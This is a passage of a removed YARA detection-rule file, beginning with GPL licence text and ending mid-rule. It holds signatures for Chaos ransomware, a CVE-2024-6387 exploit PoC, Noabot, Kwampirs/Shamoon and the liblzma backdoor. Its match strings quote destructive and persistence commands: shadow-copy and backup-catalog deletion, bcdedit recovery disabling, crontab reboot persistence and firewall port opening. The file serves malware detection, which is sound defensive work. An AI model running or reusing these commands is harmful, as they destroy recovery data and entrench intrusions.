-PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
-EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
-SUCH DAMAGES.
-
-  17. Interpretation of Sections 15 and 16.
-
-  If the disclaimer of warranty and limitation of liability provided
-above cannot be given local legal effect according to their terms,
-reviewing courts shall apply local law that most closely approximates
-an absolute waiver of all civil liability in connection with the
-Program, unless a warranty or assumption of liability accompanies a
-copy of the Program in return for a fee.
-
-                     END OF TERMS AND CONDITIONS
-
-            How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-state the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software: you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation, either version 3 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program.  If not, see <https://www.gnu.org/licenses/>.
-
-Also add information on how to contact you by electronic and paper mail.
-
-  If the program does terminal interaction, make it output a short
-notice like this when it starts in an interactive mode:
-
-    <program>  Copyright (C) <year>  <name of author>
-    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, your program's commands
-might be different; for a GUI interface, you would use an "about box".
-
-  You should also get your employer (if you work as a programmer) or school,
-if any, to sign a "copyright disclaimer" for the program, if necessary.
-For more information on this, and how to apply and follow the GNU GPL, see
-<https://www.gnu.org/licenses/>.
-
-  The GNU General Public License does not permit incorporating your program
-into proprietary programs.  If your program is a subroutine library, you
-may consider it more useful to permit linking proprietary applications with
-the library.  If this is what you want to do, use the GNU Lesser General
-Public License instead of this License.  But first, please read
-<https://www.gnu.org/licenses/why-not-lgpl.html>.
-
- */
-rule CRAIU_Crime_Chaos_Ransomware_Gen : FILE
-{
-	meta:
-		description = "Chaos ransomware generic strings"
-		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
-		id = "e909f7e4-50c2-54a6-8274-9ef92f95bf93"
-		date = "2024-05-27"
-		modified = "2024-05-28"
-		reference = "https://blog.sonicwall.com/en-us/2024/05/politically-charged-ransomware-weaponized-as-a-file-destroyer/"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_chaos_ransomware.yara#L2-L39"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "524a898e18999ceac864dbac5b85fa2f14392e389b3c32f77d58e2a89cdf01c4"
-		logic_hash = "7d2e1c9178d5bf360cebc90056bbdae6a11729b1b3c5e963c522a29fd7ba7a3e"
-		score = 75
-		quality = 60
-		tags = "FILE"
-		version = "1.0"
-
-	strings:
-		$a0 = "<Exponent>AQAB</Exponent>" ascii wide fullword
-		$a2 = "<EncryptedKey>" ascii wide fullword
-		$a15 = "vssadmin delete shadows /all /quiet & wmic shadowcopy delete" ascii wide fullword
-		$a16 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" ascii wide fullword
-		$a17 = "wbadmin delete catalog -quiet" ascii wide fullword
-		$a18 = "C:\\Users\\" ascii wide fullword
-		$a22 = "/9j/4AAQSkZJRgABAQAAAQABAAD/4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAQ4B4ADAREAAhEBAxEB/8QAHwAAAAYDAQEBAAAAAAAAAAAABAUGBwgJAgMKAQAL/8QAgRAAAQIDBQQIAwcCAgQIAAI7AQIRAwQhAAUGMUEHElFhCBMicYGRofCxwdEJFCMyQuHxFVIzYhYkQ3IKFzRTY4KSshglRHOi0uIZJlRkg5PCJzU2RVZYdJaXo9PWGkZHVVeEprO1KDllZ3V2eIaHlJWktLbDxtTV1zd3xMVmp8f" ascii wide fullword
-		$a24 = "17CqMQFeuB3NTzJ" ascii wide fullword
-		$a25 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" ascii wide fullword
-		$a26 = "7z459ajrk722yn8c5j4fg" ascii wide
-		$a27 = "2X28tfRmWaPyPQgvoHV" ascii wide
-		$a28 = "1qw0ll8p9m8uezhqhyd" ascii wide
-		$b11 = "\\Saved Games" ascii wide fullword
-
-	condition:
-		( filesize < 9MB ) and ( uint16( 0 ) == 0x5a4d ) and ( ( 3 of them ) )
-}
-rule CRAIU_Susp_Ios_Shutdown
-{
-	meta:
-		description = "Detect shutdown.log files from sysdiags with suspicious entries"
-		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
-		id = "08aa1fb9-7af0-515a-91a8-09ed35e48155"
-		date = "2023-12-28"
-		modified = "2024-03-05"
-		reference = "https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/susp_ios_shutdown.yara#L2-L25"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		logic_hash = "936101f2dddb73f6dda41be47d775199c458aa4fecdcf348ed479da620343ea1"
-		score = 65
-		quality = 85
-		tags = ""
-		version = "1.0"
-		tlp = "TLP:CLEAR"
-
-	strings:
-		$a1 = "these clients are still here:"
-		$b1 = "/private/var/db/"
-		$b2 = "/private/var/tmp/"
-		$c1 = "After "
-
-	condition:
-		($c1 at 0 ) and $a1 and ( any of ( $b* ) )
-}
-rule CRAIU_Exploit_CVE_2024_6387 : CVE_2024_6387 FILE
-{
-	meta:
-		description = "Strings from CVE-2024-6387 exploit PoC by zgzhang."
-		author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro"
-		id = "6ac63016-864d-57af-bb36-3115a0a91021"
-		date = "2024-07-02"
-		modified = "2024-07-03"
-		reference = "https://github.com/zgzhang/cve-2024-6387-poc/tree/main"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/exploit_cve_2024_6387.yara#L2-L38"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "62b06a6c30a0c891c2246ff87c0ad9ae03d2123601ba5331d6348c43b38d185e"
-		logic_hash = "d43a77c2690b5e01639590bc31fa64fa36b1da5efd3cc0761be7369ce80e4253"
-		score = 75
-		quality = 85
-		tags = "CVE-2024-6387, FILE"
-		version = "1.0"
-
-	strings:
-		$a0 = "Attempting exploitation with glibc base: 0x%lx" ascii wide fullword
-		$a1 = "Attempt %d of 20000" ascii wide fullword
-		$a2 = "Failed to establish connection, attempt %d" ascii wide fullword
-		$a3 = "SSH handshake failed, attempt %d" ascii wide fullword
-		$a4 = "Possible exploitation success on attempt %d with glibc base 0x%lx!" ascii wide fullword
-		$a5 = "Received SSH version: %s" ascii wide fullword
-		$a6 = "Connection closed while receiving SSH version" ascii wide fullword
-		$a7 = "Received KEX_INIT (%zd bytes)" ascii wide fullword
-		$a8 = "Connection closed while receiving KEX_INIT" ascii wide fullword
-		$a9 = "Estimated parsing time: %.6f seconds" ascii wide fullword
-		$a10 = "Received response after exploit attempt (%zd bytes)" ascii wide fullword
-		$a11 = "Possible hit on 'large' race window" ascii wide fullword
-		$a12 = "Connection closed by server - possible successful exploitation" ascii wide fullword
-		$a13 = "No immediate response from server - possible successful exploitation" ascii wide fullword
-		$a14 = "Attempt %d of 10000" ascii wide fullword
-
-	condition:
-		( filesize < 5MB ) and ( uint32be( 0 ) == 0x7F454C46 ) and ( 4 of ( $a* ) )
-}
-rule CRAIU_Crime_Noabot : FILE
-{
-	meta:
-		description = "Noabot is a clone of Mirai"
-		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
-		id = "8626783b-898c-587d-9b23-c8c9111cde66"
-		date = "2024-01-11"
-		modified = "2024-01-11"
-		reference = "https://www.akamai.com/blog/security-research/mirai-based-noabot-crypto-mining"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_noabot.yara#L2-L57"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "1603202a9115b83224233697f2ca1d36fef60113b94a73a15afed79a459aacc3"
-		hash = "16a28951acfe78b81046bfedb0b489efb4c9d3d1d3b8475c39b93cd5105dc866"
-		hash = "3da983ef3580a4b1b3b041cd991019b900f7995791c0acb32035ac5706085a63"
-		hash = "648a4f33b2c268523378929179af529bc064538326a1202dcdfcd9ee12ae8f6c"
-		hash = "829b3c298f7003f49986fb26920f7972e52982651ae6127c6e8e219a86f46890"
-		hash = "c723a221cff37a700e0e3b9dc5f69cdd6a4cc82502ac7c144d6ca1eaf963e800"
-		hash = "c8d3c0b87176b7f8d5667d479cb40d1b9f030d30afe588826254f26ebb4ac58e"
-		logic_hash = "51c63f45f891ee80c5e8428575f12cb5881665cb9fe26018d173335db0f02012"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		version = "1.1"
-
-	strings:
-		$a1a = "(crontab -l; printf '@reboot %s noa"
-		$a1b = "(crontab -l; printf '@reboot %s \"%s\" noa"
-		$a2 = {40 6D 61 67 69 63 40 [1-8] 6E 6F 61 [1-8] 0A 0A 49 20 61 69 6E 74 20 79 6F 75 72 20 61 76}
-		$a3 = {31 32 33 34 35 36 [1-8] 41 64 6D 69 6E 21 40 23 [1-8] 7A 68 61 6E 67 6A 69 65 31 32 33 [1-8] 43 75 6D 75 6C 75 73 4C 69 6E 75 78 21 [1-8] 61 62 63 31 32 33 24 [1-8] 77 65 62 40 31 32 33 [1-8] 6D 70 69 75 73 65 72 [1-8] 61 74 75 61 6C 69 7A 61}
-		$a4 = "HACKED: %s:%d:%s:%s"
-		$a5 = {25 64 7C 25 64 00 31 76 57 3F 3E 55 00 26 25 2423 00 67 76 64 64 60 78 65 73 00 00 26 25 24 00}
-		$b1 = "ufw allow 24816"
-		$b2 = "iptables -I INPUT -p tcp --dport 24816 -j ACCEPT"
-		$b3 = "iptables -I OUTPUT -p tcp --dport 24816 -j ACCEPT"
-		$b4 = "firewall-cmd --permanent --add-port 24816/tcp"
-		$b5 = "magicPussyMommy"
-		$c1 = "SOCKET_CREATING_ERROR SCANNER"
-		$c2 = "SOCKET_CREATING_ERROR RECYCLE"
-
-	condition:
-		filesize < 10MB and ( uint32( 0 ) == 0x464c457f ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) )
-}
-rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Dropperandmainpayload : KWAMPIRS
-{
-	meta:
-		description = "Kwampirs dropper and main payload components"
-		author = "Symantec"
-		id = "5a40a5e7-0b98-5f6e-a808-493676b57cda"
-		date = "2018-04-23"
-		modified = "2020-03-31"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L2-L80"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		logic_hash = "40e197f4278a2d14e8fe1359676558319e86728f7e61ddf612bcc894c311d53a"
-		score = 75
-		quality = 85
-		tags = "KWAMPIRS"
-		family = "Kwampirs"
-
-	strings:
-		$pubkey = {
-            06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00
-            01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5
-            97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9
-            E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31
-            48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A
-            CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11
-            56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33
-            02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2
-            9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28
-            4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B
-            4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71
-            6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9
-            59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36
-            EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82
-            C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6
-            FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D
-            90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF
-            F7 E4 0C B3
-        }
-		$network_xor_key = {
-            B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38
-            C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0
-            91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58
-            C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68
-            CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B
-            8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02
-            D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9
-            62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B
-            10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E
-            BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83
-            3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B
-            A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91
-            75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C
-            A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7
-            45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F
-            DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33
-        }
-		$decrypt_string = {
-            85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74
-            4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9
-            40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51
-            E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB
-            74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38
-            40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3
-            32 C0 C3
-        }
-		$init_strings = {
-            55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00
-            00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8
-            B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02
-            10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02
-            10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00
-            00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06
-        }
-
-	condition:
-		(2 of them )
-}
-rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Shamoon_Code : FILE
-{
-	meta:
-		description = "Kwampirs and Shamoon common code"
-		author = "FBI / cywatch@fbi.gov"
-		id = "0d403b3b-a5a8-5ac6-a12d-7181a1ad11b3"
-		date = "2020-01-14"
-		modified = "2020-03-31"
-		reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L85-L105"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		logic_hash = "5ab949280be87d242ad2843dee001eee5a338e266ef52da55883f7c77e66cf5b"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		yara_version = "3.7.0"
-
-	strings:
-		$memcpy = { 56 8B F0 85 FF 74 19 85 D2 74 15 8B CF 85 F6 74 0B 2B D7 8A 04 0A 88 01 41 4E 75 F7 8B C7 5E C3 33 C0 5E C3 }
-		$strlenW = { 33 C0 85 C9 74 17 80 3C 41 00 75 07 80 7C 41 01 00 74 0A 3D 00 94 35 77 73 03 40 EB E9 C3 }
-		$strcmp = { 85 C0 75 07 85 D2 75 40 B0 01 C3 85 D2 74 39 66 83 38 00 56 74 24 0F B7 0A 66 85 C9 74 16
-		66 8B 30 83 C2 02 83 C0 02 66 3B F1 75 18 66 83 38 00 75 E4 EB 06 66 83 38 00 75 0A 66 83 3A 00 75 04 B0
-		01 5E C3 32 C0 5E C3 32 C0 C3 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d ) and ( 1 of them )
-}
-rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Installer : FILE
-{
-	meta:
-		description = "Kwampirs installer xor keys and Unicode string length routine"
-		author = "FBI / cywatch@fbi.gov"
-		id = "8c80d0d5-8c65-5cef-ad86-b38f4d671bec"
-		date = "2020-01-14"
-		modified = "2020-03-31"
-		reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L109-L127"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		logic_hash = "ac9c3ba7188cbbe736ff81b41086fdc874ac24ae83d3cec390907f8edd0a0ce5"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		yara_version = "3.7.0"
-
-	strings:
-		$string_key = { 6C 35 E3 31 1B 23 F9 C9 65 EB F3 07 93 33 F2 A3 }
-		$resource_key = { 28 99 B6 17 63 33 EE 22 97 97 55 B5 7A C4 E1 A4 }
-		$strlenW = { 33 C0 85 C9 74 17 80 3C 41 00 75 07 80 7C 41 01 00 74 0A 3D 00 94 35 77 73 03 40 EB E9 C3}
-
-	condition:
-		(( uint16( 0 ) == 0x5a4d ) and ( 2 of them ) )
-}
-rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Implant : FILE
-{
-	meta:
-		description = "Kwampirs implant xor and rsa keys"
-		author = "FBI / cywatch@fbi.gov"
-		id = "d1c1ab0e-e07d-5f0e-97e8-5aee53ab620e"
-		date = "2020-01-14"
-		modified = "2020-03-31"
-		reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L130-L177"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		logic_hash = "a9559c17c802c6060799d0a1ee96d68bd521475dd12ff6040a74874cabe3a9a9"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		yara_version = "3.7.0"
-
-	strings:
-		$string_key = { 6C 35 E3 31 1B 23 F9 C9 65 EB F3 07 93 33 F2 A3 }
-		$beacon_key = { 28 30 A4 3F 6D 28 04 23 36 2A 32 DC AD 0B A0 4B E8 20 1F 64 84 0A F4 C4 C7 8A 8D C0
-                        A2 C4 40 19 A1 43 82 38 14 FD 6C 90 E0 7E 2A 40 DF D3 F2 3E 72 38 C4 96 4D 98 7C 16 3B 3C E7 27 B7 D0 EF
-                        7B 3C 45 06 9A 69 0D 6A 41 18 95 95 46 88 CC 19 6F EB 6B 5B F8 51 E4 2E E1 E6 8F 44 CF 20 2F 2B DE 7A 28
-                        5D DB 55 5A 1A 35 AF D8 5F 57 B8 0F A5 F7 08 4A D0 AB E5 95 31 A1 25 31 00 65 3C 70 73 99 42 0A 02 1A 69
-                        D9 A6 DF 14 B2 05 DD A8 DF F5 D9 71 6D 6E 96 5F 1B D1 0F 8E 0A 35 D4 65 FA 90 58 CC 75 02 92 B7 2C 46 ED
-                        66 33 44 75 FC A4 E0 FD B8 C8 B5 0C 3A 84 D9 23 16 A4 AF 3B 57 C6 D2 5C B3 AB 9C CD F0 B2 A4 51 43 D3 F0
-                        30 21 B5 ED 25 E3 64 B7 0C 1C A8 50 3A FF 6B 2C 32 06 B2 D1 54 3D 86 B9 1A BF 59 D7 92 59 EC 40 4A 8D B0
-                        E7 9A 9A 0D 94 19 27 D8 6D AD 5C 3E BE 14 67 DC F0 92 }
-		$download_key = { B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38 C8 E7 67 E9 C6 62 9C 50 4E 8D 00
-                        A6 59 F8 72 E0 91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58 C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7
-                        B5 68 CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B 8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02 D9
-                        25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9 62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B 10 3B 60 32
-                        1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83 3E 44 44 6C 97 85 9E
-                        7B F0 EE 32 C3 11 41 A3 6B A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91 75 AE 83 2E 1E F8 5F B5 65 ED
-                        B3 40 EA 2A 36 2C A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7 45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13
-                        74 33 0F DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33 }
-		$hashfile_key = { FE FE F5 5C 37 54 A1 6C 28 84 ED BF 84 70 25 41 56 24 37 32 98 9F A0 35 48 F3 1C 33
-                        2E F9 D0 A3 7D 36 BA 66 ED FB 52 E3 8B 07 32 5A 1A DD 19 0A F0 73 A8 C6 61 3F 3F 31 8A 93 AB F4 19 AA D8
-                        42 3B 3E 6E FC 0A 2A 41 1B 28 33 7F 79 27 41 81 14 D0 0B 24 06 4C 35 B3 23 5C F2 E4 06 7D 73 93 1C 7A 30
-                        8E 87 74 0F 53 F9 92 A3 CA 20 E3 A1 12 E1 6B 86 62 B6 CC C1 45 C9 43 43 15 59 BE 5A 77 31 D8 36 5F BD F6
-                        D7 09 65 42 3C CD 2C B1 C1 28 55 6E F9 91 3C 55 3B DF EB ED BF 84 70 25 41 56 24 37 32 98 9F A0 35 48 F3
-                        1C 33 2E F9 D0 A3 7D 36 BA 66 ED FB 52 E3 8B 07 32 5A 1A DD 19 0A F0 73 A8 C6 61 3F 3F 31 8A 93 AB F4 19
-                        AA D8 42 3B 3E 6E FC 0A 2A 41 1B 28 33 7F 79 27 41 81 14 D0 0B 24 06 4C 35 B3 23 5C F2 E4 06 7D 73 93 1C
-                        7A 30 8E 87 74 0F 53 F9 92 A3 CA 20 E3 A1 12 E1 6B 86 }
-		$rsa_key = { CD 74 15 BC 47 7E 0A 5E E4 35 22 A5 97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9 E4 7E
-                        DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31 48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A CD 43 D7 B4
-                        75 C9 19 FE CC 88 4A 7B E9 1D 8C 11 56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33 02 E2 3A 50 EA 58 D2
-                        A7 36 EE 5A D6 8F 5D 5D D2 9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28 4C 72 E1 60 AB 76 73 30 66 18
-                        BE EC F3 99 5E 4B 4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71 6B 49 08 84 61 1D 03 BA A5 42 92 F9 13
-                        33 57 D9 59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36 EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82
-                        C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6 FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D 90 DC 6C
-                        26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF F7 E4 0C B3 }
-
-	condition:
-		(( uint16( 0 ) == 0x5a4d ) and ( 2 of them ) )
-}
-rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Shamoon : FILE
-{
-	meta:
-		description = "Kwampirs Shamoon overlap"
-		author = "FBI / cywatch@fbi.gov"
-		id = "87d28867-383e-5e09-8369-63c8a4e3f966"
-		date = "2020-01-14"
-		modified = "2020-03-31"
-		reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L200-L221"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		logic_hash = "43f352c3db016d2831d11a13ae6c0baf440fa464560090e00432780df6a8982d"
-		score = 75
-		quality = 60
-		tags = "FILE"
-
-	strings:
-		$s1 = "g\\system32\\" fullword wide
-		$s2 = "ztvttw" fullword wide
-		$s3 = "lwizvm" fullword ascii
-		$op1 = { 94 35 77 73 03 40 eb e9 }
-		$op2 = { 80 7c 41 01 00 74 0a 3d }
-		$op3 = { 74 0a 3d 00 94 35 77 }
-
-	condition:
-		(( uint16( 0 ) == 0x5a4d ) and ( filesize < 4000KB ) and ( 3 of them ) )
-}
-rule CRAIU_Unk_Liblzma_Backdoor : FILE
-{
-	meta:
-		description = "liblzma backdoored"
-		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
-		id = "3527227b-e19f-5704-8a56-f7d318890658"
-		date = "2024-03-30"
-		modified = "2024-03-30"
-		reference = "https://seclists.org/oss-sec/2024/q1/268"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/unk_liblzma_backdoor.yara#L1-L30"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "8fa641c454c3e0f76de73b7cc3446096b9c8b9d33d406d38b8ac76090b0344fd"
-		hash = "319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae"
-		hash = "b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963"
-		hash = "cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537"
-		logic_hash = "ac58a38bff3020dbc881a78b70cf18279644cf6f3ede8d652be3f345ba00974f"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		version = "1.1"
-
-	strings:
-		$a1 = {f3 0f 1e fa 55 48 89 f5 4c 89 ce 53 89 fb 81 e7 00 00 00 80 48 83 ec 28 48 89 54 24 18 48 89 4c 24 10}
-		$a2 = {48 BF 30 30 30 30 30 30 30 30 8B F1 49 89 D1 89 43 28 48 89 3C 24 BF 3F FC FF 03}
-
-	condition:
-		( uint32be( 0 ) == 0x7F454C46 ) and ( filesize < 10MB ) and ( any of them )
-}
-rule CRAIU_Unk_Liblzma_Encstrings : FILE
-{
-	meta:
-		description = "liblzma backdoor, encoded strings"
